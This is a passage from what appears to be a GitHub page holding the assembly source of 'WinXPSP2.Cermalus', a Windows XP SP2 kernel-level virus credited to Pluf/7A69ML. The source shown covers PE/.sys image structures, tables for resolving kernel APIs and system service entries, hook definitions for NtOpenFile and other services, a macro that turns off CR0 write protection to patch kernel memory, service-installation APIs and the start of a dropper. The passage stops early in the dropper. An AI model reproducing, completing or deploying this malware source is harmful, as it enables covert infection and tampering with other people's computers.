-
-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathcermalus.asm
2425 lines (2235 loc) · 78.1 KB
/
cermalus.asm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
;
; WinXPSP2.Cermalus by Pluf/7A69ML
; Spain/Spring 2007
;
; greetz:
; 7A69ML team: Nullsub, Dreg, Ripe and Sha0
; special thx to Slay, GriYo, and those people
; who help me and wish to remain anonymous ;)
;
; start includes by Dreg for masm32 (m32v9r, MASM32 9.0 version) compatibility:
.586 ; rdtsc...
.model flat, stdcall
option casemap :none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\macros\ucmacros.asm
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
; end
_pushad equ 8*4
_pushad_eax equ 7*4
_pushad_ecx equ 6*4
_pushad_edx equ 5*4
_pushad_ebx equ 4*4
_pushad_esp equ 3*4
_pushad_ebp equ 2*4
_pushad_esi equ 1*4
_pushad_edi equ 0*4
IMAGE_FILE_MACHINE_I386 equ 014Ch
IMAGE_SUBSYSTEM_NATIVE equ 01h
IMAGE_SUBSYSTEM_WINDOWS_GUI equ 02h
IMAGE_SUBSYSTEM_WINDOWS_CUI equ 03h
IMAGE_FILE_EXECUTABLE_IMAGE equ 00002h
IMAGE_FILE_32BIT_MACHINE equ 00100h
IMAGE_FILE_SYSTEM equ 01000h
IMAGE_FILE_DLL equ 02000h
STATIC_PADD equ 4096
DYNAMIC_PADD equ 2048
; dos header:
mzhdr struct
mz_magic dw 05A4Dh
mz_cblp dw 00090h
mz_cp dw 00003h
mz_crcl dw 00000h
mz_cparhdr dw 00004h
mz_minalloc dw 00000h
mz_maxalloc dw 0FFFFh
mz_ss dw 00000h
mz_sp dw 000B8h
mz_csum dw 00000h
mz_ip dw 00000h
mz_cs dw 00000h
mz_lfarlc dw 00040h
mz_ovno dw 00000h
mz_res dw 4 dup (0)
mz_oemid dw 00000h
mz_oeminfo dw 00000h
mz_res2 dw 10 dup (0)
mz_lfanew dd 000000A8h
mzhdr ends
; dos stub:
dos_stub struct
db 00Eh, 01Fh, 0BAh, 00Eh, 000h, 0B4h, 009h, 0CDh
db 021h, 0B8h, 001h, 04Ch, 0CDh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06Fh, 067h, 072h
db 061h, 06Dh, 020h, 063h, 061h, 06Eh, 06Eh, 06Fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06Eh
db 020h, 069h, 06Eh, 020h, 044h, 04Fh, 053h, 020h
db 06Dh, 06Fh, 064h, 065h, 02Eh, 00Dh, 00Dh, 00Ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 05Dh, 017h, 01Dh, 0DBh, 019h, 076h, 073h, 088h
db 019h, 076h, 073h, 088h, 019h, 076h, 073h, 088h
db 0E5h, 056h, 061h, 088h, 018h, 076h, 073h, 088h
db 052h, 069h, 063h, 068h, 019h, 076h, 073h, 088h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dos_stub ends
; data directory entry:
pe_ddir struct
ddir_rva dd ? ; 00h
ddir_size dd ? ; 04h
pe_ddir ends
; export directory:
pedir_export struct
flags dd ? ; 00h
timedate dd ? ; 04h
major dw ? ; 08h
minor dw ? ; 0Ah
dllname dd ? ; 0Ch
dllbase dd ? ; 10h
numoffunctions dd ? ; 14h
numofnames dd ? ; 18h
rvaoffunctions dd ? ; 1Ch
rvaofnames dd ? ; 20h
rvaofordinals dd ? ; 24h
pedir_export ends
; import directory:
pedir_import struct
ilt dd ? ; 00h
timedate dd ? ; 04h
forward dd ? ; 08h
name_ dd ? ; 0Ch
iat dd ? ; 10h
pedir_import ends
; PE header:
pehdr struct
; signature:
pe_signature dd 00004550h
; file header:
pe_coff_machine dw 0014Ch
pe_coff_numofsects dw 00001h
pe_coff_timedatastamp dd 045F207DDh
pe_coff_symrva dd 000000000h
pe_coff_symcount dd 000000000h
pe_coff_ophdrsize dw 000E0h
pe_coff_flags dw 0010Eh
; optional header:
pe_ophdr_magic dw 0010Bh
pe_ophdr_majorlink db 005h
pe_ophdr_minorlink db 00Ch
pe_ophdr_sizeofcode dd (((offset drvcode_end - offset drvcode_begin)+(20h-1)) and (not(20h-1)))
pe_ophdr_sizeofinitdata dd 000000000h
pe_ophdr_sizeofuinitdata dd 000000000h
pe_ophdr_entrypointrva dd 000000200h
pe_ophdr_baseofcoderva dd 000000200h
pe_ophdr_baseofdatarva dd (((offset drv_end - offset drv_begin)+(20h-1)) and (not(20h-1)))
pe_ophdr_imagebase dd 000010000h
pe_ophdr_sectalign dd 000000020h
pe_ophdr_filealign dd 000000020h
pe_ophdr_majorosv dw 00004h
pe_ophdr_minorosv dw 00000h
pe_ophdr_majorimagev dw 00000h
pe_ophdr_minorimagev dw 00000h
pe_ophdr_majorsubsv dw 00004h
pe_ophdr_minorsubsv dw 00000h
pe_ophdr_unknown dd 000000000h
pe_ophdr_imagesize dd (offset drv_end - offset drv_begin)
pe_ophdr_hdrsize dd 000000200h
pe_ophdr_checksum dd 000000000h
pe_ophdr_subsystem dw 00001h
pe_ophdr_dllflags dw 00000h
pe_ophdr_stackreservesize dd 00100000h
pe_ophdr_stackcommitsize dd 00001000h
pe_ophdr_heapreservesize dd 00100000h
pe_ophdr_heapcommitsize dd 00001000h
pe_ophdr_loaderflags dd 00000000h
pe_ophdr_rvaandsizecount dd 00000010h
; data directory []
pe_dd_export pe_ddir <?>
pe_dd_import pe_ddir <?>
pe_dd_rsrc pe_ddir <?>
pe_dd_except pe_ddir <?>
pe_dd_security pe_ddir <?>
pe_dd_reloc pe_ddir <?>
pe_dd_debug pe_ddir <?>
pe_dd_arch pe_ddir <?>
pe_dd_global pe_ddir <?>
pe_dd_tls pe_ddir <?>
pe_dd_config pe_ddir <?>
pe_dd_bound pe_ddir <?>
pe_dd_iat pe_ddir <?>
pe_dd_delay pe_ddir <?>
pe_dd_com pe_ddir <?>
pe_dd_rsrv pe_ddir <?>
pehdr ends
; section table entry:
pe_sect struct
sect_name db 2Eh, 74h, 65h, 78h, 74h, 3 dup(0)
sect_virtsize dd (offset drvcode_end - offset drvcode_begin)
sect_virtaddr dd 000000200h
sect_rawsize dd (((offset drvcode_end - offset drvcode_begin)+(20h-1)) and (not(20h-1)))
sect_rawaddr dd 000000200h
sect_reladdr dd 000000000h
sect_lineaddr dd 000000000h
sect_relcount dw 00000h
sect_linecount dw 00000h
sect_flags dd 068000020h
pe_sect ends
; section table:
sectbl struct
text pe_sect <>
sectbl ends
; basic .sys file format:
sys_body struct
sys_mz_hdr mzhdr <>
sys_dos dos_stub <>
sys_pe_hdr pehdr <>
sys_sectbl sectbl <>
sys_pad dd 14 dup(0)
sys_body ends
;-------------------------------------
; ring0 data
;-------------------------------------
; ring0 apis structs:
api_entry struct
va dd ?
eat dd ?
api_entry ends
; apis ntoskrnl.exe:
ntosapi struct
DbgPrint api_entry <>
DbgPrintEx api_entry <>
DbgPrintReturnControlC api_entry <>
ExAllocatePool api_entry <>
ExFreePool api_entry <>
IoAllocateMdl api_entry <>
IoCompleteRequest api_entry <>
IoCreateDevice api_entry <>
IoCreateFile api_entry <>
IoDeleteDevice api_entry <>
IoDriverObjectType api_entry <>
IoFreeMdl api_entry <>
KeBugCheck api_entry <>
KeInitializeDpc api_entry <>
KeInitializeSpinLock api_entry <>
KeInitializeTimer api_entry <>
KeServiceDescriptorTable api_entry <>
KeSetTimer api_entry <>
MmGetSystemRoutineAddress api_entry <>
MmProbeAndLockPages api_entry <>
MmUnlockPages api_entry <>
ObDereferenceObject api_entry <>
ObReferenceObjectByHandle api_entry <>
ProbeForRead api_entry <>
ProbeForWrite api_entry <>
PsRemoveCreateThreadNotifyRoutine api_entry <>
PsSetCreateProcessNotifyRoutine api_entry <>
PsSetCreateThreadNotifyRoutine api_entry <>
ZwClose api_entry <>
ZwCreateSection api_entry <>
ZwMapViewOfSection api_entry <>
ZwOpenDirectoryObject api_entry <>
ZwOpenFile api_entry <>
ZwQueryInformationFile api_entry <>
ZwUnmapViewOfSection api_entry <>
wcscmp api_entry <>
ntosapi ends
ntos_api_count equ (size ntosapi) shr 2
; api hall.dll:
halapi struct
KeAcquireSpinLock api_entry <>
KeGetCurrentIrql api_entry <>
KeReleaseSpinLock api_entry <>
halapi ends
hal_api_count equ (size halapi) shr 2
; ring0api:
ring0api struct
ntos_base dd ?
ntos ntosapi <>
hal_base dd ?
hal halapi <>
ring0api ends
ring0_api_count equ (size ring0api) shr 2
; ring0 nt services:
ntserv_entry struct
va dd ?
ssdt dd ?
ntserv_entry ends
ntservices struct
NtDebugActiveProcess ntserv_entry <>
NtEnumerateBootEntries ntserv_entry <>
NtOpenFile ntserv_entry <>
ntservices ends
ntservices_count equ (size ntservices) shr 2
; ring0data:
ring0data struct
api ring0api <>
ntdll_map_base dd ?
services ntservices <>
service_table dd ?
service_count dd ?
driver_object dd ?
module_list dd ?
kirql dd ?
kspinlock dd ?
reserved dd 4 dup(?)
ring0data ends
;--------------------------------------
; ring0 include
;--------------------------------------
; ntstauts:
STATUS_SUCCESS equ 000000000h
STATUS_UNSUCCESSFUL equ 0C0000001h
STATUS_NOT_IMPLEMENTED equ 0C0000002h
STATUS_IMAGE_NOT_AT_BASE equ 040000003h
; bugcheck code:
POWER_FAILURE_SIMULATE equ 0000000E5h
; major function codes for IRPs:
IRP_MJ_CREATE equ 00h
IRP_MJ_CREATE_NAMED_PIPE equ 01h
IRP_MJ_CLOSE equ 02h
IRP_MJ_READ equ 03h
IRP_MJ_WRITE equ 04h
IRP_MJ_QUERY_INFORMATION equ 05h
IRP_MJ_SET_INFORMATION equ 06h
IRP_MJ_QUERY_EA equ 07h
IRP_MJ_SET_EA equ 08h
IRP_MJ_FLUSH_BUFFERS equ 09h
IRP_MJ_QUERY_VOLUME_INFORMATION equ 0Ah
IRP_MJ_SET_VOLUME_INFORMATION equ 0Bh
IRP_MJ_DIRECTORY_CONTROL equ 0Ch
IRP_MJ_FILE_SYSTEM_CONTROL equ 0Dh
IRP_MJ_DEVICE_CONTROL equ 0Eh
IRP_MJ_INTERNAL_DEVICE_CONTROL equ 0Fh
IRP_MJ_SHUTDOWN equ 10h
IRP_MJ_LOCK_CONTROL equ 11h
IRP_MJ_CLEANUP equ 12h
IRP_MJ_CREATE_MAILSLOT equ 13h
IRP_MJ_QUERY_SECURITY equ 14h
IRP_MJ_SET_SECURITY equ 15h
IRP_MJ_POWER equ 16h
IRP_MJ_SYSTEM_CONTROL equ 17h
IRP_MJ_DEVICE_CHANGE equ 18h
IRP_MJ_QUERY_QUOTA equ 19h
IRP_MJ_SET_QUOTA equ 1Ah
IRP_MJ_PNP equ 1Bh
IRP_MJ_PNP_POWER equ IRP_MJ_PNP
IRP_MJ_MAXIMUM_FUNCTION equ 1Bh
; values for the Attributes field:
OBJ_INHERIT equ 00000002h
OBJ_PERMANENT equ 00000010h
OBJ_EXCLUSIVE equ 00000020h
OBJ_CASE_INSENSITIVE equ 00000040h
OBJ_OPENIF equ 00000080h
OBJ_OPENLINK equ 00000100h
OBJ_KERNEL_HANDLE equ 00000200h
OBJ_VALID_ATTRIBUTES equ 000003F2h
NtCurrentProcess equ -1
NtCurrentThread equ -2
; (enum) pool type:
NonPagedPool equ 0
PagedPool equ 1
; (enum) lock operation:
IoReadAccess equ 0
IoWriteAccess equ 1
IoModifyAccess equ 2
; (enum) mode:
KernelMode equ 0
UserMode equ 1
MaximumMode equ 2
STANDARD_RIGHTS_REQUIRED equ 000F0000h
FILE_DIRECTORY_FILE equ 00000001h
FILE_SYNCHRONOUS_IO_NONALERT equ 020h
FileStandardInformation equ 5
; (enum) section inherit:
ViewShare equ 1
ViewUnmap equ 2
; Interrupt Request Level (IRQL):
KIRQL typedef BYTE
PKIRQL typedef PTR BYTE
; Spin Lock:
KSPIN_LOCK typedef DWORD ; ULONG_PTR
PKSPIN_LOCK typedef PTR DWORD
; list entry:
list_entry struct ; size = 08h
Flink dd ? ; 00h
Blink dd ? ; 04h
list_entry ends
; unicode string:
unicode_string struct ; size = 08h
_Length dw ? ; 00h
MaximumLength dw ? ; 02h
Buffer dd ? ; 04h
unicode_string ends
; large integer:
large_integer struct ; size = 08h
LowPart dd ? ; 00h
HighPart dd ? ; 04h
large_integer ends
; io status block:
io_status_block struct ; size = 08h
Status dd ? ; 00h
Information dd ? ; 04h
io_status_block ends
; memory descriptor list:
mdl struct ; size = 01Ch
Next dd ? ; 00h
_Size dw ? ; 04h
MdlFlags dw ? ; 06h
Process dd ? ; 08h
MappedSystemVa dd ? ; 0Ch
StartVa dd ? ; 10h
ByteCount dd ? ; 14h
ByteOffset dd ? ; 18h
mdl ends
; driver extension:
driver_extension struct ; size = 18h
DriverObject dd ? ; 00h
AddDevice dd ? ; 04h
Count dd ? ; 08h
ServiceKeyName unicode_string <> ; 0Ch
ClientDriverExtension dd ? ; 14h
FsFilterCallbacks dd ? ; 18h
driver_extension ends
; driver object:
driver_object struct ; size = 0A8h
_Type dw ? ; 00h
_Size dw ? ; 04h
DeviceObject dd ? ; 04h
Flags dd ? ; 08h
DriverStart dd ? ; 0Ch
DriverSize dd ? ; 10h
DriverSection dd ? ; 14h
DriverExtension dd ? ; 18h
DriverName unicode_string <> ; 1Ch
HardwareDatabase dd ? ; 24h
FastIoDispatch dd ? ; 28h
DriverInit dd ? ; 2Ch
DriverStartIo dd ? ; 30h
DriverUnload dd ? ; 34h
MajorFunction dd (IRP_MJ_MAXIMUM_FUNCTION + 1) dup(?) ; 0038h
driver_object ends
; object directory entry:
object_directory_entry struct ; size = 08h
ChainLink dd ? ; 00h
Object dd ? ; 04h
object_directory_entry ends
; object directory:
object_directory struct ; size = 0A2h
HashBuckets dd 37 dup(?) ; 00h
_Lock dd ? ; 094h
DeviceMap dd ? ; 098h
SessionId dd ? ; 09Ch
Reserved dw ? ; 0A0h
SymbolicLinkUsageCount dw ? ; 0A2h
object_directory ends
; object header:
object_header struct ; size = 018h
PointerCount dd ? ; 00h
HandleCount dd ? ; 04h
NextToFree dd ? ; 04h
_Type dd ? ; 08h
NameInfoOffset db ? ; 0Ch
HandleInfoOffset db ? ; 0Dh
QuotaInfoOffset db ? ; 0Eh
Flags db ? ; 0Fh
ObjectCreateInfo dd ? ; 10h
QuotaBlockCharged dd ? ; 10h
SecurityDescriptor dd ? ; 14h
Body dd ? ; 18h
object_header ends
; ServiceDescriptorEntry:
service_descriptor_entry struct ; size = 10h
ServiceTableBase dd ? ; 00h
ServiceCounterTableBase dd ? ; 04h
NumberOfServices dd ? ; 08h
ParamTableBase dd ? ; 0Ch
service_descriptor_entry ends
; deferred procedure call (DPC) object:
kdpc struct ; size = 020h
_Type dw ? ; 00h
Number db ? ; 02h
Importance db ? ; 03h
DpcListEntry list_entry <> ; 04h
DeferredRoutine dd ? ; 0Ch
DeferredContext dd ? ; 10h
SystemArgument1 dd ? ; 14h
SystemArgument2 dd ? ; 18h
_Lock dd ? ; 1Ch
kdpc ends
; timer object:
ktimer struct ; size = 028h
Header dd 4 dup(?) ; 00h
DueTime large_integer <> ; 10h
TimerListEntry list_entry <> ; 18h
Dpc dd ? ; 20h
Period dd ? ; 24h
ktimer ends
; object attributes:
object_attributes struct ; size = 18h
_Length dd ? ; 00h
RootDirectory dd ? ; 04h
ObjectName dd ? ; 08h
Attributes dd ? ; 0Ch
SecurityDescriptor dd ? ; 10h
SecurityQualityOfService dd ? ; 14h
object_attributes ends
; file standard information:
file_standard_information struct ; size = 018h
AllocationSize large_integer <> ; 00h
EndOfFile large_integer <> ; 08h
NumberOfLinks dd ? ; 10h
DeletePending db ? ; 14h
Directory db ? ; 15h
db 2 dup(?)
file_standard_information ends
; thread information block, XPSP2 version:
nt_tib struct ; sizeof = 1Ch
ExceptionList dd ? ; 00h
StackBase dd ? ; 04h
StackLimit dd ? ; 08h
SubSystemTib dd ? ; 0Ch
union
FiberData dd ? ; 10h
Version dd ? ; 10h
ends
ArbitraryUserPointer dd ? ; 14h
Self dd ? ; 18h
nt_tib ends
; processor control region, XPSP2 version:
kpcr struct ; size = 54h
NtTib nt_tib <> ; 00h
SelfPcr dd ? ; 1Ch
Prcb dd ? ; 20h
Irql dd ? ; 24h
IRR dd ? ; 28h
IrrActive dd ? ; 2Ch
IDR dd ? ; 30h
KdVersionBlock dd ? ; ptr
IDT dd ? ; 38h
GDT dd ? ; 3Ch
TSS dd ? ; 40h
MajorVersion dw ? ; 44h
MinorVersion dw ? ; 46h
SetMember dd ? ; 48h
StallScaleFactor dd ? ; 4Ch
DebugActive db ? ; 50h
Number db ? ; 51h
db 2 dup(?) ; 052
kpcr ends
; PsLoadedModuleList module entry
module_entry struct
list list_entry <>
unk1 dd 4 dup(?)
base dd ?
entrypoint dd ?
unk2 dd ?
path unicode_string <>
_name unicode_string <>
; ...
module_entry ends
; offset KPCR->KdVersionBlock, XPSP2 version:
KPCR_KDVERSIONBLOCK_OFFSET equ 034h
; kernel debug data header32, XPSP2 version:
dbgkd_debug_data_header32 struct ; size = 0Ch
List list_entry <> ; 00h
OwnerTag dd ? ; 08h
_size dd ? ; 0Ch
dbgkd_debug_data_header32 ends
; kernel debugger data32, XPSP2 version:
kddebugger_data32 struct
Header dbgkd_debug_data_header32 <>
KernBase dd ?
BreakpointWithStatus dd ?
SavedContext dd ?
ThCallbackStack dw ?
NextCallback dw ?
FramePointer dw ?
PaeEnabled dw ?
KiCallUserMode dd ?
KeUserCallbackDispatcher dd ?
PsLoadedModuleList dd ?
PsActiveProcessHead dd ?
PspCidTable dd ?
ExpSystemResourcesList dd ?
ExpPagedPoolDescriptor dd ?
ExpNumberOfPagedPools dd ?
KeTimeIncrement dd ?
KeBugCheckCallbackListHead dd ?
KiBugcheckData dd ?
IopErrorLogListHead dd ?
ObpRootDirectoryObject dd ?
ObpTypeObjectType dd ?
MmSystemCacheStart dd ?
MmSystemCacheEnd dd ?
MmSystemCacheWs dd ?
MmPfnDatabase dd ?
MmSystemPtesStart dd ?
MmSystemPtesEnd dd ?
MmSubsectionBase dd ?
MmNumberOfPagingFiles dd ?
MmLowestPhysicalPage dd ?
MmHighestPhysicalPage dd ?
MmNumberOfPhysicalPages dd ?
MmMaximumNonPagedPoolInBytes dd ?
MmNonPagedSystemStart dd ?
MmNonPagedPoolStart dd ?
MmNonPagedPoolEnd dd ?
MmPagedPoolStart dd ?
MmPagedPoolEnd dd ?
MmPagedPoolInformation dd ?
MmPageSize dd ?
MmSizeOfPagedPoolInBytes dd ?
MmTotalCommitLimit dd ?
MmTotalCommittedPages dd ?
MmSharedCommit dd ?
MmDriverCommit dd ?
MmProcessCommit dd ?
MmPagedPoolCommit dd ?
MmExtendedCommit dd ?
MmZeroedPageListHead dd ?
MmFreePageListHead dd ?
MmStandbyPageListHead dd ?
MmModifiedPageListHead dd ?
MmModifiedNoWritePageListHead dd ?
MmAvailablePages dd ?
MmResidentAvailablePages dd ?
PoolTrackTable dd ?
NonPagedPoolDescriptor dd ?
MmHighestUserAddress dd ?
MmSystemRangeStart dd ?
MmUserProbeAddress dd ?
KdPrintCircularBuffer dd ?
KdPrintCircularBufferEnd dd ?
KdPrintWritePointer dd ?
KdPrintRolloverCount dd ?
MmLoadedUserImageList dd ?
kddebugger_data32 ends
;--------------------------------------
; ring3 data
;--------------------------------------
; ring3 apis structs:
api_entry struct
va dd ?
eat dd ?
api_entry ends
; apis kernel32.dll:
kernapi struct
CloseHandle api_entry <>
CreateFileA api_entry <>
CreateFileMappingA api_entry <>
DeleteFileA api_entry <>
GetFullPathNameA api_entry <>
LoadLibraryA api_entry <>
MapViewOfFile api_entry <>
UnmapViewOfFile api_entry <>
VirtualAlloc api_entry <>
VirtualFree api_entry <>
WriteFile api_entry <>
kernapi ends
kern_api_count equ (size kernapi) shr 2
; apis ntdll.dll:
ntdllapi struct
ZwEnumerateBootEntries api_entry <>
ntdllapi ends
ntdll_api_count equ (size ntdllapi) shr 2
; apis advapi32.dll:
advapi struct
CloseServiceHandle api_entry <>
ControlService api_entry <>
CreateServiceA api_entry <>
DeleteService api_entry <>
OpenSCManagerA api_entry <>
OpenServiceA api_entry <>
StartServiceA api_entry <>
advapi ends
adv_api_count equ (size advapi) shr 2
; ring3api:
ring3api struct
kern_base dd ?
kern kernapi <>
adv_base dd ?
adv advapi <>
ntdll_base dd ?
ntdll ntdllapi <>
ring3api ends
ring3_api_count equ (size ring3api) shr 2
; ring3data:
ring3data struct
api ring3api <>
file_handle dd ?
map_addr dd ?
map_handle dd ?
scm_handle dd ?
service_handle dd ?
buff dd ?
ring3data ends
;--------------------------------------
; ring3 include
;--------------------------------------
; service status:
service_status struct ; size = 01Ch
dwServiceType dd ? ; 00h
dwCurrentState dd ? ; 04h
dwControlsAccepted dd ? ; 08h
dwWin32ExitCode dd ? ; 0Ch
dwServiceSpecificExitCode dd ? ; 10h
dwCheckPoint dd ? ; 14h
dwWaitHint dd ? ; 18h
service_status ends
;--------------------------------------
; hooks/callbacks data
;--------------------------------------
hook_data_offset equ 0Bh
hook_data struct
signature dd ?
return_ dd ?
hook_data ends
pssetcreateprocessnotifyroutine_param_count equ 02h
pssetremovecreatethreadnotifyroutine_params_count equ 01h
ntdebugactiveprocess_param_count equ 02h
ntenumeratebootentries_param_count equ 02h
ntopenfile_param_count equ 06h
custom_dpc_param_count equ 04h
driverentry_param_count equ 02h
driverunload_param_count equ 01h
;--------------------------------------
; DPC wdog context
;--------------------------------------
wdog_context struct
Dpc kdpc <> ; 00h
Timer ktimer <> ; 20h
data dd ? ; 48h
wdog_context ends
;--------------------------------------
; macros
;--------------------------------------
; get callback parameter:
@gparam macro reg, pnum
mov reg, dword ptr [esp + _pushad + 4 + (pnum * 4)]
endm
; initialize object attributes:
@init_object_attributes macro p, r, n, a, s
mov dword ptr [p + object_attributes._Length], size object_attributes
mov dword ptr [p + object_attributes.RootDirectory], r
mov dword ptr [p + object_attributes.ObjectName], n
mov dword ptr [p + object_attributes.Attributes], a
mov dword ptr [p + object_attributes.SecurityDescriptor], s
mov dword ptr [p + object_attributes.SecurityQualityOfService], s
endm
; ring0 callback begin:
@cb_begin macro
pushad ; save initial registers
call getdelta ; get delta offset: ebp
mov ebx, dword ptr [ebp] ; get ptr to ring0data: ebx
endm
; ring0 callback end:
@cb_end macro args
mov dword ptr [esp + _pushad_eax], eax ; set ret value: eax
popad ; restore initial registers
ret (args * 4) ; clean stack: stdcall args >= 0, cdecl args = 0
endm
; disable page protection:
@unprotect_mring0 macro
cli
push eax
mov eax, cr0
and eax, not 10000h
mov cr0, eax
pop eax
endm
; enable page protection:
@protect_mring0 macro
push eax
mov eax, cr0
or eax, 10000h
mov cr0, eax
pop eax
sti
endm
; end string:
@endsz macro
local nxtchr
nxtchr: lodsb
test al,al
jnz nxtchr
endm
;--------------------------------------
; SEH
;--------------------------------------
except_handler struct
EH_Dummy dd ?
EH_ExceptionRecord dd ?
EH_EstablisherFrame dd ?
EH_ContextRecord dd ?
EH_DispatcherContext dd ?
except_handler ends
; create seh frame:
@ring3seh_setup_frame macro handler
local set_new_eh
call set_new_eh
mov esp, dword ptr [esp + except_handler.EH_EstablisherFrame]
handler
set_new_eh: assume fs:nothing
push fs:[0]
mov fs:[0], esp
endm
; remove seh frame:
@ring3seh_remove_frame macro
assume fs:nothing
pop fs:[0]
add esp, 4
endm
;--------------------------------------
; dropper code
;--------------------------------------
.code
start:
xor eax, eax
dec eax
shr eax, 20
mov ecx, eax
not ecx
mov ebx, offset drv_end - offset start
add ebx, eax
and ebx, ecx
mov edx, offset start
and edx, ecx
push edx
push eax
push esp
push PAGE_READWRITE
push ebx
push edx
call VirtualProtect
mov esi, offset api_names_begin
next_module_crc_table:
lodsd
test eax, eax
jz end_crc
mov edi, eax
lodsb
movzx ecx, al
next_api_crc:
mov eax, esi
call gen_crc32_szname
stosd
@endsz
loop next_api_crc
xchg eax, ecx
stosd
mov eax, esi
call gen_crc32_szname
stosd
@endsz
jmp next_module_crc_table
end_crc:
mov eax, offset host_start
mov dword ptr [host_start_ep], eax
pop eax
pop edx
push esp
push eax
push ebx
push edx
call VirtualProtect
jmp ring3_start
host_start:
xor edi, edi
push edi
push offset _title
push offset _text
push edi
call MessageBox
push edi
call ExitProcess
api_names_begin: